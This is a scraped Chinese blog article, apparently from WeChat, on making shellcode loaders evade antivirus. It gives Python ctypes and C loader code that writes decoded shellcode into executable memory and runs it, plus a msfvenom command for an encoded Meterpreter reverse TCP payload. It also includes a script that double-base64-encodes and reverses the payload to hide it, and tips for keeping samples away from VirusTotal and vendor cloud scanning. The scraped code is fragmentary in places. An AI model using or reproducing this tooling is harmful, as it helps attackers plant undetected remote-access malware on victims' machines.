2020-12-20 11:02:35 Author: mp.weixin.qq.com(查看原文) 阅读量:731 收藏




import ctypes

shellcode = """"""
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))








VirtualAlloc RtlMoveMemory CreateThread WaitForSingleObject这四个方法,我们直接使用即可。









个人经验告诉你,使用Python Ruby这种解释型语言,打包成EXE就算是正常程序也很有可能被拦截,而像C和GO以及C ++这种编译型语言则不会有这种问题。免杀,放在虚拟机,并且断网防止被上传,自己弄了老半天的东西免杀变成,却坚持不了多久。还有也不要上传VT等杀毒网站,会被厂商拿去分析的免杀的时候也不要上传到反对360的云查杀。下面我来叙述一下我的思路。


ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes .c_int(len(shellcode))),


import ctypes

a = "shellcode"
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
shell = "6374797065732e77696e646c6c2e6b65726e656c33322e52746c4d6f76654d656d6f7279286374797065732e635f696e7428707472292c206275662c206374797065732e635f696e74286c656e287368656c6c636f6465292929"
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))





static const unsigned char pr2six[256] =
    /* ASCII table */
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
    52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
    64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
    15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
    64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
int Base64decode_len(const char* bufcoded)
    int nbytesdecoded;
    register const unsigned char* bufin;
    register int nprbytes;
    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63);
    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;
    return nbytesdecoded + 1;
int Base64decode(char* bufplain, const char* bufcoded)
    int nbytesdecoded;
    register const unsigned char* bufin;
    register unsigned char* bufout;
    register int nprbytes;
    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63);
    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;
    bufout = (unsigned char*)bufplain;
    bufin = (const unsigned char*)bufcoded;
    while (nprbytes > 4) {
        *(bufout++) =
            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
        *(bufout++) =
            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
        *(bufout++) =
            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
        bufin += 4;
        nprbytes -= 4;
    /* Note: (nprbytes == 1) would be an error, so just ingore that case */
    if (nprbytes > 1) {
        *(bufout++) =
            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
    if (nprbytes > 2) {
        *(bufout++) =
            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
    if (nprbytes > 3) {
        *(bufout++) =
            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
    *(bufout++) = '\0';
    nbytesdecoded -= (4 - nprbytes) & 3;
    return nbytesdecoded;
static const char basis_64[] =
int Base64encode_len(int len)
    return ((len + 2) / 3 * 4) + 1;
int Base64encode(char* encoded, const char* string, int len)
    int i;
    char* p;
    p = encoded;
    for (i = 0; i < len - 2; i += 3) {
        *p++ = basis_64[(string >> 2) & 0x3F];
        *p++ = basis_64[((string & 0x3) << 4) |
            ((int)(string[i + 1] & 0xF0) >> 4)];
        *p++ = basis_64[((string[i + 1] & 0xF) << 2) |
            ((int)(string[i + 2] & 0xC0) >> 6)];
        *p++ = basis_64[string[i + 2] & 0x3F];
    if (i < len) {
        *p++ = basis_64[(string >> 2) & 0x3F];
        if (i == (len - 1)) {
            *p++ = basis_64[((string & 0x3) << 4)];
            // *p++ = '=';
        else {
            *p++ = basis_64[((string & 0x3) << 4) |
                ((int)(string[i + 1] & 0xF0) >> 4)];
            *p++ = basis_64[((string[i + 1] & 0xF) << 2)];
        //*p++ = '=';
    *p++ = '\0';
    return p - encoded;

string_change(unsigned char* p) {
    int i, len;
    char temp;
    len = strlen(p);
    for (size_t i = 0; i < (len / 2); i++)
        temp = p[i];
        p[i] = p[len - 1 - i];
        p[len - 1 - i] = temp;


msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost= lport=4444 -f c -o shell.c


import base64,sys

text = """#include <string.h>
#pragma comment(linker,"/subsystem:\\"Windows\\" /entry:\\"mainCRTStartup\\"")
static const unsigned char pr2six[256] =
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
    52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
    64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
    15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
    64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
int Base64decode_len(const char* bufcoded)
    int nbytesdecoded;
    register const unsigned char* bufin;
    register int nprbytes;
    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63);
    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;
    return nbytesdecoded + 1;
int Base64decode(char* bufplain, const char* bufcoded)
    int nbytesdecoded;
    register const unsigned char* bufin;
    register unsigned char* bufout;
    register int nprbytes;
    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63);
    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;
    bufout = (unsigned char*)bufplain;
    bufin = (const unsigned char*)bufcoded;
    while (nprbytes > 4) {
        *(bufout++) =
            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
        *(bufout++) =
            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
        *(bufout++) =
            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
        bufin += 4;
        nprbytes -= 4;
    /* Note: (nprbytes == 1) would be an error, so just ingore that case */
    if (nprbytes > 1) {
        *(bufout++) =
            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
    if (nprbytes > 2) {
        *(bufout++) =
            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
    if (nprbytes > 3) {
        *(bufout++) =
            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
    *(bufout++) = '\\0';
    nbytesdecoded -= (4 - nprbytes) & 3;
    return nbytesdecoded;
static const char basis_64[] =
int Base64encode_len(int len)
    return ((len + 2) / 3 * 4) + 1;
int Base64encode(char* encoded, const char* string, int len)
    int i;
    char* p;
    p = encoded;
    for (i = 0; i < len - 2; i += 3) {
        *p++ = basis_64[(string
 >> 2) & 0x3F];
        *p++ = basis_64[((string
 & 0x3) << 4) |
            ((int)(string[i + 1] & 0xF0) >> 4)];
        *p++ = basis_64[((string[i + 1] & 0xF) << 2) |
            ((int)(string[i + 2] & 0xC0) >> 6)];
        *p++ = basis_64[string[i + 2] & 0x3F];
    if (i < len) {
        *p++ = basis_64[(string
 >> 2) & 0x3F];
        if (i == (len - 1)) {
            *p++ = basis_64[((string
 & 0x3) << 4)];
            // *p++ = '=';
        else {
            *p++ = basis_64[((string
 & 0x3) << 4) |
                ((int)(string[i + 1] & 0xF0) >> 4)];
            *p++ = basis_64[((string[i + 1] & 0xF) << 2)];
        //*p++ = '=';
    *p++ = '\\0';
    return p - encoded;

string_change(unsigned char* p) {
    int i, len;
    char temp;
    len = strlen(p);
    for (size_t i = 0; i < (len / 2); i++)
        temp = p[i];
        p[i] = p[len - 1 - i];
        p[len - 1 - i] = temp;
    unsigned char init_buf[] = "%s";
    char kekeoyyds_bufs[1024] = { 0 };
    char kekeoyyds_buf[1024] = { 0 };
    Base64decode(kekeoyyds_bufs, init_buf);
    Base64decode(kekeoyyds_buf, kekeoyyds_bufs);
    char* dmagic_memory;
    dmagic_memory = VirtualAlloc(NULL, sizeof(kekeoyyds_buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(dmagic_memory, kekeoyyds_buf, sizeof(kekeoyyds_buf));

if __name__ == '__main__':
    if len(sys.argv) == 3:
        print("开始处理:%s" % sys.argv[1])
        with open(sys.argv[1]) as file:
            shellcode = ""
            for i in file.readlines():
                if "unsigned" not in i:
                    shellcode += i.strip("\n").strip("\r").strip(";").strip("\"")
            exec('shellcode = b"%s"' % shellcode)
            shellcode = base64.b64encode(shellcode)
            shellcode = base64.b64encode(shellcode)
            shellcode = shellcode.decode("utf8")[::-1]
            with open("./"+sys.argv[2],"w+"as shellcodefile:
                shellcodefile.write(text % shellcode)
                print("处理完毕:%s" % sys.argv[2])
        print("python base.py shell.c shellcode.c")


#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")












文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650496935&idx=3&sn=f0261a5dd04783faf8d10fa98f7a5e0b&chksm=83ba3a43b4cdb3558aa7369928c5db3f683d3022f350d2d3f6745c2c93c7e5a6f8ffe31991c6#rd